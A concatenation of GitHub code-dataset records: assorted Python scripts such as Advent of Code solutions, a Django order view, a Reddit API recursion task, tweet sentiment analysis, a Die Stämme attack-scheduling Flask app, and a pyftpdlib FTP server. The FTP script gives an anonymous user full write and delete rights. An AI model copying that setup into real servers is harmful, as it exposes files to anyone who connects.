self.pseudo_table[len_table-1] == item\n if name is not None:\n assert self.pseudo_table[name] == item\n\n @pytest.mark.parametrize('name', ['int2', None])\n def test_append(self, name):\n value = {'int2': 20, None: 21}[name]\n item = {'int2': MockUUIDObject(name=\"int2\", normal_attr=value),\n None: UnnamedUUID(normal_attr=value)}[name]\n\n len_table = len(self.pseudo_table)\n\n self.pseudo_table.append(item)\n assert item in self.pseudo_table\n assert self.pseudo_table[len_table] == item\n if name is not None:\n assert self.pseudo_table[name] == item\n\n def test_delitem(self):\n assert len(self.pseudo_table) == len(all_objects) + 1\n assert self.objs['int'] in self.pseudo_table\n int_idx = self.pseudo_table._sequence.index(self.objs['int'])\n del self.pseudo_table[int_idx]\n assert len(self.pseudo_table) == len(all_objects)\n assert self.objs['int'] not in self.pseudo_table\n with pytest.raises(KeyError, match='int'):\n self.pseudo_table['int']\n\n def test_len(self):\n assert len(self.pseudo_table) == len(all_objects) + 1\n\n @pytest.mark.parametrize('name', ['int2', None])\n def test_insert(self, name):\n value = {'int2': 20, None: 21}[name]\n item = {'int2': MockUUIDObject(name=\"int2\", normal_attr=value),\n None: UnnamedUUID(normal_attr=value)}[name]\n\n len_table = len(self.pseudo_table)\n\n self.pseudo_table.insert(len_table, item)\n assert item in self.pseudo_table\n assert self.pseudo_table[len_table] == item\n if name is not None:\n assert self.pseudo_table[name] == item\n","repo_name":"openpathsampling/openpathsampling","sub_path":"openpathsampling/experimental/simstore/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"78"} +{"seq_id":"71525037053","text":"\nfrom collections import Counter\n\nwith open('inputs/2021-12-03.txt') as input_file:\n file = [_ for _ in input_file.read().splitlines()]\n file_copy = file.copy()\n\n\nBINARY_LENGTH = len(file[0])\n\n# PART 1\ngamma, epsilon = '', ''\n\nfor i in range(BINARY_LENGTH):\n\n bits = [b[i] for b in file]\n counts = Counter(bits)\n\n if counts['1'] > counts['0']:\n gamma += '1'\n epsilon += '0'\n elif counts['0'] > counts['1']:\n gamma += '0'\n epsilon += '1'\n\ngamma = int(gamma, 2)\nepsilon = int(epsilon, 2)\nprint(gamma * epsilon)\n\n# PART 2\noxygen, co2 = 0, 0\n\nfor i in range(BINARY_LENGTH):\n\n # OXYGEN\n bits = [b[i] for b in file]\n counts = Counter(bits)\n\n if counts['1'] >= counts['0']:\n file = [b for b in file if b[i] == '1']\n else:\n file = [b for b in file if b[i] == '0']\n\n if len(file) == 1:\n oxygen = file[0]\n\n # CO2\n bits = [b[i] for b in file_copy]\n counts = Counter(bits)\n\n if counts['1'] >= counts['0']:\n file_copy = [b for b in file_copy if b[i] == '0']\n else:\n file_copy = [b for b in file_copy if b[i] == '1']\n\n if len(file_copy) == 1:\n co2 = file_copy[0]\n\noxygen = int(oxygen, 2)\nco2 = int(co2, 2)\nprint(oxygen * co2)\n","repo_name":"aaronrausch/advent-of-code","sub_path":"2021/2021-12-03.py","file_name":"2021-12-03.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9891325792","text":"import uuid\nfrom datetime import date\n\nfrom django.shortcuts import render\n\nfrom boec.models.customermodel.Customer import Customer\nfrom boec.models.itemmodel.Item import Item\nfrom boec.models.ordermodel.Order import Order\n\n\ndef create_order(request, item_id):\n item = Item.objects.get(id=item_id)\n total = ((100 - float(item.discount))/100) * float(item.price)\n return render(request, 'order_details.html', {'item':item, 'total':total})\n\ndef confirm_order(request, item_id):\n item = Item.objects.get(id=item_id)\n total = ((100 - float(item.discount)) / 100) * float(item.price)\n customerId = request.session.get('customer_id')\n customer = Customer.objects.get(id=customerId)\n now = date.today()\n code=uuid.uuid4()\n order = Order.objects.create(customer=customer, item=item, total=total, code=code, createDate=now, status='CREATED')\n shipTotal = total * 0.05\n return render(request, 'shipment_information.html', {'order':order, 'shipTotal':shipTotal, 'customerName':order.customer.__getName__()})","repo_name":"trinhvandat/boec-python","sub_path":"boec/business/orderdao/OrderDAO.py","file_name":"OrderDAO.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15582741712","text":"# default package\nimport xml.etree.ElementTree as ET\nfrom logging import getLogger\nfrom typing import Dict\n\n# third party\nimport pandas as pd\nimport requests\n\n# logger\nlogger = getLogger(__name__)\n\n\ndef get_value(element: ET.Element, query: str) -> str:\n \"\"\"elementの要素をfindして結果をtextとして返す。queryがない場合はNoneを返す。\n\n Args:\n element (ET.Element): 検索するelemnet\n query (str): 検索クエリ\n\n Returns:\n str: 検索結果\n \"\"\"\n val = element.find(query)\n return val.text if val is not None else None\n\n\ndef convert_type(element: ET.Element) -> Dict:\n \"\"\"elementから要素をDictとして返す。\n\n Args:\n element (ET.Element): 探索するelement\n\n Returns:\n Dict: データ\n \"\"\"\n return {\n \"title\": get_value(element, \"title\"),\n \"link\": get_value(element, \"link\"),\n \"author\": get_value(element, \"author\"),\n \"pubDate\": get_value(element, \"pubDate\"),\n }\n\n\ndef _main() -> None:\n \"\"\"動作テスト用の簡易スクリプト\n \"\"\"\n # ログ設定\n import logging\n\n logging.basicConfig(level=logging.INFO)\n\n # パラメータ設定\n url = \"http://iss.ndl.go.jp/api/opensearch\"\n params_example = {\n \"title\": \"機械学習\",\n \"mediatype\": \"1\",\n \"from\": \"2019-01-01\",\n \"cnt\": \"10\",\n \"idx\": \"1\",\n }\n\n # API に問い合わせ\n response = requests.get(url, params_example)\n\n # XML 形式で取得できるので pandas.DataFrame 形式に変換\n root = ET.fromstring(response.text.encode(\"utf-8\"))\n df = pd.DataFrame([convert_type(item) for item in root.findall(\".//item\")])\n\n # 取得結果を表示\n logger.info(f\"=== data ===\\n{df.head()}\")\n\n\nif __name__ == \"__main__\":\n _main()\n","repo_name":"iimuz/til","sub_path":"python/iss_ndl_api/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"ja","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"74661723131","text":"#niveles de ingreso de una persona durante el 2020 \nimport matplotlib.pyplot as plt\ningresos = [300, 450, 420, 200, 540, 210, 360, 410, 520, 600, 390, 550]\nmeses = ['Enero', 'Febrero', 'Marzo', 'Abril', 'Mayo', 'Junio', 'Julio', 'Agosto', 'Septiembre', 'Octubre', 'Noviembre', 'Diciembre']\nplt.bar (meses, ingresos, width=0.3, color= 'y')\nplt.title ('Ingresos de una persona en el 2020')\nplt.xlabel ('Meses')\nplt.ylabel ('Ingresos de una persona en miles')\nplt.savefig ('ingresos.png')\nplt.show()\n\n","repo_name":"Izavella-Valencia/programacion","sub_path":"Talleres/Tallergraficos.py","file_name":"Tallergraficos.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1290965331","text":"'''\n1) rearrange the word ---> “gamanra”\ntestcase1 = [“anagram”, “gamanra”, True]\n2) rearrange and change capitalization ---> “GraMana”\nI need two tests to verify that capitalization is ignored for both input strings\ntestcase2a= [“anagram”, “GraMana”, True]\ntestcase2b= [“AnAgrAm”, “gramana”, True]\n3) swap only 2 characters\na) at the start “naagram”\ntestcase3a= [“anagram”,“naagram”, True]\nb) in the middle “anargam”\ntestcase3b= [“anagram”, “anargam”, True]\nc) at the end “anagrma”\ntestcase3c= [“anagram”, “anagrma”, True]\n4) test the shortest possible anagram (containing only two characters)\ntestcase4 = [“an”, “na”, True]\n\nanother examples:\n\nJim Morrison = Mr Mojo Risin\nDamon Albarn = Dan Abnormal\nGeorge Bush = He bugs Gore\nClint Eastwood = Old West action\nRonald Reagan = A d;rn long era\nElvis = Lives\nMadonna Louise Ciccone = One cool dance musician\n\n-------------------------------------------------------------------------------------\npositive_testcases = {\"Ronald Reagan\": \"A darn long era\", \"Elvis\": \"Lives\",\n \"Madonna Louise Ciccone\": \"One cool dance musician\",\n \"Jim Morrison\": \"Mr Mojo Risin\",\n \"Damon Albarn\": \"Dan Abnormal\",\n \"George Bush\": \"He bugs Gore\",\n \"Clint Eastwood\": \"Old West action\",\n \"AnAgrAm\": \"gramana\",\n \"an\": \"na\"}\n--------------------------------------------------------------------------------------\n\nFor simplicity, I keep my base word “anagram”\n1) a completely different word\na) of same length\ntestcase1a = [“anagram”, “wxdcfvb”, False]\nb) of different length\ntestcase1b = [“anagram”, “python”, False]\n\n-------------------------------------------------------------------------------------\nnegative_testcases = {\"anagram\": \"wxdcfvb\", \"anagramx\": \"python\"}\n--------------------------------------------------------------------------------------\n\n'''\n\nfrom solutions.Strings import anagrams\n\npositive_testcases = {\"Ronald Reagan\": \"A darn long era\", \"Elvis\": \"Lives\",\n \"Madonna Louise Ciccone\": \"One cool dance musician\",\n \"Jim Morrison\": \"Mr Mojo Risin\",\n \"Damon Albarn\": \"Dan Abnormal\",\n \"George Bush\": \"He bugs Gore\",\n \"Clint Eastwood\": \"Old West action\",\n \"AnAgrAm\": \"gramana\",\n \"an\": \"na\"}\nnegative_testcases = {\"anagram\": \"wxdcfvb\", \"anagramx\": \"python\"}\n\n\ndef test_anagram_v1():\n for firstString, secondString in positive_testcases.items():\n assert anagrams.anagram_v1(firstString, secondString) is True\n\n for firstString, secondString in negative_testcases.items():\n assert anagrams.anagram_v1(firstString, secondString) is False\n\n\ndef test_anagram_v2():\n for firstString, secondString in positive_testcases.items():\n assert anagrams.anagram_v2(firstString, secondString) is True\n for firstString, secondString in negative_testcases.items():\n assert anagrams.anagram_v2(firstString, secondString) is False\n","repo_name":"ajaymahar/Python-ds-algo","sub_path":"tests/test_anagrams.py","file_name":"test_anagrams.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"12293076087","text":"# 가방문제\n# 냅색 문제는 기본적으로 dp[j] 에 j(금액)일때 최소/최대가 되는 가치 저장 \n\nn, m = map(int, input().split())\ndp = [0]*(m+1)\n\nfor i in range(n): # 각 인풋 물건에 대하여 (w, v) = (무게, 가치)\n w, v = map(int, input().split())\n\n for x in range(w, m+1): # 보석의 무게부터 끝까지\n tmp = dp[x-w] + v # dp[x-w]+v 가 dp[x] 보다 크면 대입\n \n if tmp > dp[x]: # 이때 dp[x-w]에서 x-w은 자신의 무게를 넣고 남은 값이라 생각.\n dp[x]=tmp # 그 남은 값을 채우는 가치의 최댓값이 dp[x-w]이니\n # 이를 자기 가치(v) 와 더하면 x번째의 가치(dp[x])의 최댓값이 됨 \n\nprint(dp[m])","repo_name":"jhan756k/Algorithm","sub_path":"Study/동적계획법/냅색알고리즘_무한사용.py","file_name":"냅색알고리즘_무한사용.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36369463720","text":"# https://www.codewars.com/kata/clock-in-mirror/train/python\n\ndef what_is_the_time(time_in_mirror):\n t = time_in_mirror.split(':')\n range = 60 * 12\n t[0] = int(t[0]) * 60\n t[1] = int(t[1])\n cur_time = sum(t)\n res_time = range - cur_time\n conv_hou = res_time / 60\n conv_min = res_time - (60 * conv_hou)\n \n if len(str(conv_min)) == 1:\n conv_min = \"0\" + str(conv_min)\n if len(str(conv_hou)) == 1:\n conv_hou = \"0\" + str(conv_hou)\n \n conv_time = str(conv_hou) + \":\" + str(conv_min)\n \n if conv_time[:2] == \"00\":\n conv_time = \"12\" + conv_time[-3:]\n if conv_time[:2] == \"-1\":\n conv_time = \"11\" + conv_time[-3:]\n return conv_time\n\n","repo_name":"zerotheblackmage/codewar","sub_path":"mirClock.py","file_name":"mirClock.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9971143408","text":"\"\"\"\r\n035\r\nDesenvolva um programa que leia o comprimento de três retas e diga ao usuário se\r\nelas podem ou não formar um triângulo\r\n\"\"\"\r\nfrom termcolor import colored\r\n\r\n\r\ndef triangulo(a, b, c):\r\n if a * b * c <= 0:\r\n return False\r\n if a <= abs(b-c) or a > (b+c):\r\n return False\r\n return True\r\n\r\n\r\nladoA = int(input(\"Digite o lado A: \"))\r\nladoB = int(input(\"Digite o lado B: \"))\r\nladoC = int(input(\"Digite o lado C: \"))\r\n\r\n\r\nif triangulo(ladoA, ladoB, ladoC):\r\n print(colored(\"Eh possivel formar um triangulo com os lados {} {} {}\".format(ladoA, ladoB, ladoC), \"green\"))\r\nelse:\r\n print(colored(\"Nao eh possivel formar um triangulo com os lados {} {} {}\".format(ladoA, ladoB, ladoC), \"red\"))","repo_name":"vitorsemidio-dev/curso-python-guanabara","sub_path":"Desafios/Aula 010/ex035.py","file_name":"ex035.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33927769548","text":"#-------Python v3.8.10-------#\n\n#Tri du fichier sal.txt en fonction de la 12eme colonne après SAL_GEN\n\n\ndef exercice_un():\n\n#Lecture du fichier sal.txt avec spécification de l'encodage pour le point d'interrogation inversé\n with open(\"../data/sal.txt\", encoding=\"latin-1\") as file:\n data = file.read()\n\n#Création d'une liste des différents clients en découpant les données autour des SAL_GEN\n list_clients = data.split(\"SAL_GEN\")\n\n#Je retire la ligne html qui a été ajoutée au dernier client\n list_clients[len(list_clients)-1] = list_clients[len(list_clients)-1].split(\"\")[0]\n\n#Je retire également la première entrée qui est vide puisqu'elle est avant le premier SAL_GEN\n list_clients = list_clients[1:]\n\n#Pour chaque client, je construit une liste de ses différents champs en séparés du ¿\n data_clients = []\n for i in range(len(list_clients)):\n data_clients.append(list_clients[i].split(\"¿\"))\n data_clients[i] = data_clients[i][1:]\n\n#Création de la nouvelle liste contenant les clients ordonnées en fonction de la 12ème colonne\n sorted_data_clients = sorted(data_clients,key = lambda x: x[11])\n\n#Reconstruction des données en concaténant les différentes listes et en rajoutant les séparateurs\n result = \"SAL_GEN\"\n for i in range(len(sorted_data_clients)):\n result += \"¿\"\n for y in range(len(sorted_data_clients[i])):\n result += sorted_data_clients[i][y]\n#On s'assure de ne pas rajouter le séparateur pour la dernière ligne\n if y != len(sorted_data_clients[i]) - 1:\n result += \"¿\"\n#Idem\n if i != len(sorted_data_clients) - 1:\n result += \"SAL_GEN\"\n\n#Rajout du compteur\n count = \"\" + str(len(sorted_data_clients)) + \"\\n\"\n result += count\n\n#On écrit les données triées dans un fichier qui sera créé dans le dossier results/tri\n sorted_file = open(\"../results/tri/exercice1.txt\",\"w\")\n sorted_file.write(result)\n sorted_file.close()\n\n return 0\n\n#-------------------Lancement de la fonction-------------------#\n\nexercice_un()\n\n","repo_name":"ClementCorm/tests_tech_cormier","sub_path":"tests_tech_cormier_clement/scripts_tri/script_ex1.py","file_name":"script_ex1.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39866974891","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\n@author: Ali Yusuf\r\n\"\"\"\r\n# Download snscrape model to scrape tweets and also vaderSentiment model to conduct the sentiment analysis\r\n# To download models use the two following commands in the Anaconda command prompt terminal\r\n# pip install snscrape\r\n# pip install vaderSentiment\r\n\r\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\r\nimport snscrape.modules.twitter as sntwitter\r\nimport pandas as pd\r\nimport seaborn as sns\r\n\r\n# Creating list to append tweet data to\r\ntweets_list2 = []\r\n\r\n# Using TwitterSearchScraper to scrape data and append tweets to list\r\nfor i, tweet in enumerate(sntwitter.TwitterSearchScraper('CDC COVID since:2022-01-01 until:2022-05-01').get_items()):\r\n if i > 3000:\r\n break\r\n tweets_list2.append([tweet.date, tweet.id, tweet.content])\r\n\r\n# Creating a dataframe from the tweets list above\r\ntweets_df2 = pd.DataFrame(tweets_list2, columns=[\r\n 'Datetime', 'Tweet Id', 'Text'])\r\n\r\narticle_text = tweets_df2[\"Text\"].tolist()\r\n\r\n# from vaderSentiment import SentimentIntensityAnalyzer (as we downloaded it using pip install)\r\n\r\n\r\n# the seintmentintensityanalyzer that we just imported is saved as analyzer to ease its use\r\nanalyzer = SentimentIntensityAnalyzer()\r\nfor sentence in article_text: # here we are taking all the 80 quotes in the list\r\n # then for each of these quotes we will use the analyzer to find the polarity score for each sentence and saved it as vs \"VaderSentiment\"\r\n vs = analyzer.polarity_scores(sentence)\r\n # we are formatting the output and printing each sentence with the vs scores next to it\r\n print(\"{:>0} {}\".format(sentence, (vs)))\r\n\r\n# we are setting our display options\r\npd.set_option(\"display.max_colwidth\", 100)\r\n\r\n# creating a dataframe showing the quotes in the list\r\ndf = pd.DataFrame(article_text, columns=[\"tweets\"])\r\n\r\n\r\ndef get_scores(tweets): # create a function of analyzer model to analyze the quotes we added to the dataframe\r\n # analyze the quotes via the vader analyzer\r\n vader_scores = analyzer.polarity_scores(tweets)\r\n\r\n return pd.Series({\r\n 'Quotes': tweets,\r\n 'Vader': vader_scores['compound'],\r\n }) # assign the analyzer to variables of the dataframe to display it\r\n\r\n\r\n# we are creating a dataframe and recalling the function we created and applying it on the quotes\r\nscores = df.tweets.apply(get_scores)\r\n# Take the numeric data of scores and round them to -1 Negative if they are below 0 and 1 Positive if greater than 0 (0 will remain 0 Neutral)\r\nnum = scores._get_numeric_data()\r\nnum[num < 0] = -1\r\nnum[num > 0] = 1\r\n\r\n# display the dataframe with color map (Red, Yellow, Green) depending on negative red and positive green with below 0.4 getting low and above 0.4 getting high to enable balancing with yellow\r\nscores.style.background_gradient(cmap='RdYlGn', axis=None, low=0.4, high=0.4)\r\nfig = sns.countplot(x='Vader', data=scores)\r\nfg = fig.get_figure()\r\nfg.savefig('Vader_Score.png') #save figure\r\n\r\n# resources https://www.analyticsvidhya.com/blog/2021/06/twitter-sentiment-analysis-a-nlp-use-case-for-beginners/\r\n# resource2 https://medium.com/dataseries/how-to-scrape-millions-of-tweets-using-snscrape-195ee3594721\r\n","repo_name":"alimyusuf/Sentiment_Analysis_for_Policy","sub_path":"Sentiment_Analysis_Vader_Tweets.py","file_name":"Sentiment_Analysis_Vader_Tweets.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15715452735","text":"#!/usr/bin/python3\n'''\n___________________\nmodule that contains recurse(subreddit, hot_list=[]): function\n___________________\n'''\nimport requests\nimport sys\n\n\ndef recurse(subreddit, hot_list=[]):\n '''\n return the first number of hot posts listed for a given subreddit.\n '''\n after = None\n request = None\n if len(subreddit.split(\"|\")) > 1:\n after = subreddit.split(\"|\")[1]\n request = requests.get(\n 'https://www.reddit.com/r/' + subreddit.split(\"|\")[0] +\n '/hot.json?after='+subreddit.split(\"|\")[1],\n allow_redirects=False,\n headers={'User-agent': 'gefrancof'}\n )\n else:\n request = requests.get(\n 'https://www.reddit.com/r/' + subreddit +\n '/hot.json',\n allow_redirects=False,\n headers={'User-agent': 'gefrancof'}\n )\n if request.status_code == 200:\n\n dictionary = request.json()\n\n data = dictionary['data']\n\n if data[\"after\"] is None:\n return hot_list\n else:\n for data_index in data['children']:\n data_children = data_index['data']\n hot_list.append(data_children['title'])\n return recurse(\n subreddit.split(\"|\")[0] +\n \"|\" + data[\"after\"],\n hot_list)\n","repo_name":"gefranco/holberton-system_engineering-devops","sub_path":"0x16-api_advanced/2-recurse.py","file_name":"2-recurse.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17163832117","text":"import sys\nn,k = map(int,input().split())\na=[int(sys.stdin.readline())for _ in range(n)]\na.reverse()\ncnt = 0\nfor i in a:\n cnt += k//i\n k %= i\n if k == 0:\n break\nprint(cnt)","repo_name":"twodf78/coding_test","sub_path":"GreedyAlgorithm/11047.py","file_name":"11047.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15726218243","text":"c, d = int(input()), int(input())\nn, m = int(input()), int(input())\nk = int(input())\ndef sol(c, d ,n, m ,k):\n ans = 0\n if not k >= n * m:\n main_price = c / n\n add_price = float(d)\n if add_price <= main_price:\n ans = d(n * m - k)\n else:\n exact = d * ((n * m - k) % n) + c * ((n * m - k) // n)\n approx = c * ((n * m - k) // n + 1)\n ans = min(exact, approx)\n return ans\n\n\nprint(sol(c, d, n, m, k))\n","repo_name":"Roomdead/SIAOD","sub_path":"Курсач/N1.py","file_name":"N1.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72549687611","text":"\"\"\"Author: @speckly\nhttps://github.com/speckly\n\nA program to start a ftp server and allow users to interact with it \nRef: \nhttps://pyftpdlib.readthedocs.io/en/latest/tutorial.html\nhttps://pyftpdlib.readthedocs.io/en/latest/api.html\n\"\"\"\n\ntry:\n from pyftpdlib.authorizers import DummyAuthorizer\n from pyftpdlib.handlers import FTPHandler\n from pyftpdlib.servers import FTPServer\nexcept ModuleNotFoundError:\n import os\n MODULE = \"pyftpdlib\"\n if input(f\"{MODULE} is required to run this program, execute pip install {MODULE}? (Y): \").lower().strip() in [\"\", \"y\"]:\n os.system(f\"pip install {MODULE}\")\n else:\n exit()\n\ndef servStart():\n # Instantiate a dummy authorizer for managing 'virtual' users\n authorizer = DummyAuthorizer() # handle permission and user\n # Define an anonymous user and input home directory having read permissions\n while True:\n try:\n direct = input(\"Enter server home directory: \")\n authorizer.add_anonymous(direct , perm='elradfmwM') #originally elr is not enough \n break\n except:\n print(\"Invalid directory please try again\")\n # Instantiate FTP handler class\n handler = FTPHandler # understand FTP protocol\n handler.authorizer = authorizer\n\n # Instantiate FTP server class and listen on 127.0.0.1:2121\n address = ('127.0.0.1', 2121)\n server = FTPServer(address, handler)\n\n server.serve_forever()\n\nservStart()","repo_name":"speckly/sec-test","sub_path":"ftp-server.py","file_name":"ftp-server.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2352751430","text":"def print_cube(slices,zdim):\n slice_num = 0\n for slice in slices:\n print(\"z=\" + str(slice_num))\n for row in slice:\n print (row)\n slice_num += 1\n\ndef expand_z(slices):\n #add 2 slices to cube\n size_xy = len(slices[0][0])\n new_row = ['.'] * size_xy\n new_slicef = []\n new_sliceb = []\n for i in range(0,size_xy):\n new_slicef.append(new_row.copy())\n new_sliceb.append(new_row.copy())\n slices.insert(0,new_slicef)\n slices.append(new_sliceb)\n\ndef count_active(slices):\n count = 0 \n for slice in slices:\n for row in slice:\n for elem in row:\n if elem == '#':\n count += 1\n return count\n\ndef expand_xy(slices):\n size_xy = len(slices[0][0])\n new_size_xy = size_xy + 2\n new_row = ['.'] * new_size_xy\n for slice in slices:\n for row in slice:\n #expand row to left and right\n row.insert(0,'.')\n row.append('.')\n #add row at top and bottom\n \n slice.insert(0,new_row.copy())\n slice.append(new_row.copy())\n\ndef get_val(slices,x,y,z):\n #size_xy = len(slices[0][0])\n #size_z = len(slices)\n return slices[z][y][x]\ndef set_val(slices,x,y,z, val):\n slices[z][y][x] = val\n\ndef get_active_count(slices,x,y,z):\n lim = [-1,0,1]\n size_xy = len(slices[0][0])\n size_z = len(slices)\n if get_val(slices,x, y, z) == '#':\n count = -1\n else:\n count = 0\n for off_x in lim:\n x_loc = x + off_x\n if x_loc >= 0 and x_loc < size_xy: \n for off_y in lim:\n y_loc = y + off_y\n if y_loc >= 0 and y_loc < size_xy:\n for off_z in lim:\n z_loc = z + off_z\n if z_loc >=0 and z_loc < size_z: \n if get_val(slices,x_loc, y_loc, z_loc) == '#':\n count += 1\n return count \n\n\n\n\n\nfile = open('input.txt', 'r')\n\n\nslices = []\nz_dim = 0\ninit_slice = []\nfor line in file:\n row = line.strip()\n row = list(row)\n init_slice.append(row)\n\nslices.append(init_slice)\n\nprint_cube(slices,z_dim)\n\n\n\n\n\nfor cycle in range(1,7):\n expand_z(slices)\n expand_xy(slices)\n print_cube(slices,cycle)\n size_xy = len(slices[0][0])\n size_z = len(slices)\n\n #build next cube:\n next_cube = []\n\n for z in range(0,size_z):\n new_slice = []\n for y in range(0,size_xy):\n new_row = []\n for x in range(0,size_xy):\n adj = get_active_count(slices,x,y,z)\n val = get_val(slices,x,y,z)\n if val == '#':\n if adj == 2 or adj == 3:\n new_row.append('#')\n else:\n new_row.append('.')\n elif val == '.' and adj == 3:\n new_row.append('#')\n else:\n new_row.append(val)\n new_slice.append(new_row)\n next_cube.append(new_slice)\n \n #print(\"cycle=\" + str(cycle))\n #print(count_active(slices))\n print_cube(next_cube,cycle)\n \n slices = next_cube\n \n\n\nprint(count_active(slices))","repo_name":"kwiegand/Advent-of-Code-2020","sub_path":"17/puz.py","file_name":"puz.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42222936068","text":"gracz1 = input(\"Podaj nazwe: \")\ngracz2 = input(\"Podaj nazwe: \")\n\ngracz1_wybor = input(\"%s, Co wybierasz? Kamień, Papier, Nożyczki?\" % gracz1)\ngracz2_wybor = input(\"%s, Co wybierasz? Kamień, Papier, Nożyczki?\" % gracz2)\n\n\ndef ruchy(gracz1, gracz2):\n if gracz1 == gracz2:\n return (\"Remis\")\n elif gracz1 == 'Kamień':\n if gracz2 == 'Nożyczki':\n return (\"Kamień wygrywa\")\n else:\n return (\"Papier wygrywa\")\n elif gracz1 == 'Nożyczki':\n if gracz2 == 'Papier':\n return (\"Nożyczki wygrały\")\n else:\n return (\"Kamień wygrywa\")\n elif gracz1 == 'Papier':\n if gracz2 == 'Kamień':\n return (\"Papier wygrywa\")\n else:\n return (\"Nożyczki wygrały\")\n else:\n return (\"Błąd, złe dane. Spróbuj ponownie.\")\n\nprint(ruchy(gracz1_wybor, gracz2_wybor))","repo_name":"Kubaxoxo/Projkety-PY","sub_path":"pr py1/papier,kamien,nozyce.py","file_name":"papier,kamien,nozyce.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71004749053","text":"def selectionSort(number, size):\r\n for i in range(size):\r\n min = i\r\n\r\n for x in range(i + 1, size):\r\n if number[x] < number[min]:\r\n min = x\r\n\r\n number[i], number[min] = number[min], number[i]\r\n\r\n\r\nnumbers = [1, 9, 2, 10, 8, 13, 5]\r\nsize = len(numbers)\r\nselectionSort(numbers, size)\r\nprint(f\"Numbers: {numbers}\")\r\n","repo_name":"AkisGeorg/Python-Scripts","sub_path":"Selection Sort Function.py","file_name":"Selection Sort Function.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18447712760","text":"from flask import Flask, render_template, request, redirect, flash, url_for, send_from_directory\nfrom flask.json import jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import desc\nimport os, ast\nimport json\nimport dateutil.parser\nfrom datetime import datetime, timedelta\nfrom dstimer import import_action\nfrom dstimer import import_template\nfrom dstimer import import_keks\nfrom dstimer import __version__, __needUpdate__\nfrom dstimer import delete_action\nfrom dstimer import world_data\nfrom dstimer import common\nimport dstimer.common as common\nimport dstimer.incomings_handler as incomings_handler\nfrom dstimer.import_keks import check_and_save_sids\nfrom operator import itemgetter, attrgetter\nimport logging\nfrom dstimer.models import *\nfrom dstimer import app, db, restart\nlogger = logging.getLogger(\"dstimer\")\n\n\ndef innocdn_url(path):\n # return \"https://dsde.innogamescdn.com/8.58/30847\" + path\n return \"https://dsde.innogamescdn.com/asset/3cc5e90\" + path\n\n\ndef sids_status():\n try:\n with open(os.path.join(common.get_root_folder(), \"status.txt\")) as fd:\n return json.load(fd)\n except:\n return []\n\n\ndef get_templates():\n path = os.path.join(os.path.expanduser(\"~\"), \".dstimer\", \"templates\")\n templates = []\n for filename in os.listdir(path):\n if os.path.isfile(os.path.join(path, filename)):\n with open(os.path.join(path, filename)) as fd:\n units = json.load(fd)\n template = {}\n template[\"name\"] = filename[:filename.rfind(\"_\")]\n template[\"id\"] = filename[filename.rfind(\"_\") + 1:-9]\n template[\"units\"] = units\n templates.append(template)\n return templates\n\n\ndef get_scheduled_actions(folder=\"schedule\"):\n schedule_path = os.path.join(os.path.expanduser(\"~\"), \".dstimer\", folder)\n actions = []\n player = []\n village_data = None\n for file in os.listdir(schedule_path):\n if os.path.isfile(os.path.join(schedule_path, file)):\n with open(os.path.join(schedule_path, file)) as fd:\n action = json.load(fd)\n if village_data is None:\n village_data = world_data.get_village_data(action[\"domain\"]) # bug wenn angriffe von mehreren welten geplant\n for dataset in village_data:\n if action[\"source_id\"] == int(dataset[0]):\n action[\"source_village_name\"] = world_data.unquote_name(dataset[1])\n if action[\"target_id\"] == int(dataset[0]):\n action[\"target_village_name\"] = world_data.unquote_name(dataset[1])\n action[\"departure_time\"] = dateutil.parser.parse(action[\"departure_time\"])\n action[\"arrival_time\"] = dateutil.parser.parse(action[\"arrival_time\"])\n action[\"world\"] = action[\"domain\"].partition(\".\")[0]\n action[\"id\"] = file[file.rfind(\"_\") + 1:-4]\n action[\"size\"] = import_action.get_attack_size(action[\"units\"])\n if action[\"player\"] not in player:\n player.append(action[\"player\"])\n 